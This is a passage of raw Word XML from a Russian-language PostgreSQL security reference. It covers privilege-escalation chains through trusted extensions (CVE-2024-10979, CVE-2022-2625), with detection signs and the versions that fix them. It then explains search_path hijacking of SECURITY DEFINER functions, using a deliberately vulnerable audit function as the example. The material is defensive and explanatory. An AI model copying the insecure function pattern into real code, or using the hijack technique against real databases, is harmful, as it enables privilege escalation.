        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="76E1A55F"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7074C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-2625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FFB053" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>chain 2 (extension scripts ownership)</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1C1F17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49921C8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от tenant-admin для trusted-расширений — стандартный self-service паттерн в SaaS-платформах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E54EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Supabase — non-superuser-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authenticator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет CREATE на собственной БД, может ставить pg_trgm/citext/hstore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC9357" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Crunchy Bridge, Aiven — аналогично, customer имеет owner-роль с CREATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD2D86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   multi-tenant on-prem deployments — каждый tenant_admin администрирует свою БД</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54283B01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C8096" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pP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ddl_command_end</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от роли, у которой обычно нет потребности в Perl (например, web-app роль, не DBA-роль).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8DD18F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для chain 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функций в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после CREATE EXTENSION plperl содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{</w:t>
      </w:r>
      <w:r>
        <w:t>. На версиях PG до фикса 2024-10979 это критический индикатор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD3755" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для chain 2: pre-existing функция в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или другой схеме), сигнатура которой совпадает с signature из ожидаемого CREATE EXTENSION install-script — пример уже описан в 3.13.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230B6A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   На версиях PG ≥ 13.0 + до фиксов CVE-2024-10979 / CVE-2022-2625 — установка любого trusted extension от не-DBA роли стоит ревьюить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC31C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DBA70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusted extensions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступны с PG 13.0 (январь 2021). До PG 13 — все extensions требовали superuser, R28-chain невозможен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47964829" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chain 1 закрыт:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG ≥ 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21 (фикс CVE-2024-10979, 14.11.2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B25D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chain 2 закрыт:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG ≥ 14.5 / 13.8 / 12.12 / 11.17 / 10.22 (фикс CVE-2022-2625, 11.08.2022).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C74D86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   На версиях PG ≥ 14.5 + ≥ 17.1 (или соответствующих веток) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>оба chain заблокированы</w:t>
      </w:r>
      <w:r>
        <w:t>, но trusted-extensions сами по себе остаются — это окно для будущих аналогичных CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5CBF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9DDA95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальная стадия chain 1. Содержит pre-condition / trigger / post-exploitation детали.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D74D89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4 CVE-2022-2625</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальная стадия chain 2. Содержит механику pre-create и ownership-takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C65E94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий принцип защиты от подобных hijack-сценариев.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F273D7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — куда уходят финальные RCE-векторы после успешной эскалации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EC990" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 (Mitigations: расширения)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекомендации по управлению </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privilege, audit-логированию extensions, ограничению trusted-set в production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68377B8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B625B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «CREATE EXTENSION» (раздел Trusted Extensions) — https://www.postgresql.org/docs/current/sql-createextension.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05491541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Packaging Related Objects into an Extension» (control-файл, trusted флаг) — https://www.postgresql.org/docs/current/extend-extensions.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC10A12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Severalnines: «Overview of trusted extensions in PostgreSQL 13» — https://severalnines.com/blog/overview-trusted-extensions-postgresql-13/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC3BDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   dbi-services: «PostgreSQL 13 trusted extensions» — https://www.dbi-services.com/blog/postgresql-13-trusted-extensions/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698179A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgPedia: trusted extension — https://pgpedia.info/t/trusted-extension.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724085B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   PostgreSQL Project Security Advisory CVE-2024-10979 (chain 1) — https://www.postgresql.org/support/security/CVE-2024-10979/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C614FFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory CVE-2022-2625 (chain 2) — https://www.postgresql.org/support/security/CVE-2022-2625/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46A14F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R28 (sources/research.md, строки 414–431; open question 8 на строке 564)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA72BF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E7B86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атрибут функции, указывающий что её тело исполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>с привилегиями владельца функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не вызывающего. Это стандартный механизм PostgreSQL для безопасного делегирования (audit-logging, permission checks, encapsulated business logic). Опасный антипаттерн: SECURITY DEFINER без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в definition — вызывающий контролирует свой search_path, что позволяет ему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>подсунуть trojan-функцию в pg_temp и hijack-нуть любое unqualified-имя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри тела SECURITY DEFINER функции. Результат — arbitrary SQL под привилегиями owner-а (типично superuser или application-admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E58085" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это документированное поведение PostgreSQL, известное с начала 2000-х. Защита тривиальна, но регулярно забывается в кодбазах. PostgreSQL Docs прямо предупреждает: «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always set search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in SECURITY DEFINER functions».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C805B0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333157B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- DBA создаёт audit-trail функцию для логирования действий пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FDD89A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- audit_log принадлежит superuser, application-роли не имеют прямой доступ —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B415E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- только через эту SECURITY DEFINER обёртку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7A08B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2396D5D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.audit_action(user_name text, action text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95FDFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS void LANGUAGE plpgsql SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D6976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03C7A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E5DAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  INSERT INTO audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CAF28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  VALUES (lower(user_name), action, now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F486E5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BEE803" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7893D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8D44E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- owner функции — superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B5AAF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- USAGE на схему app + EXECUTE на функцию выданы PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526BF45C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В function-теле — три unqualified-вызова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>now()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, неявный оператор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
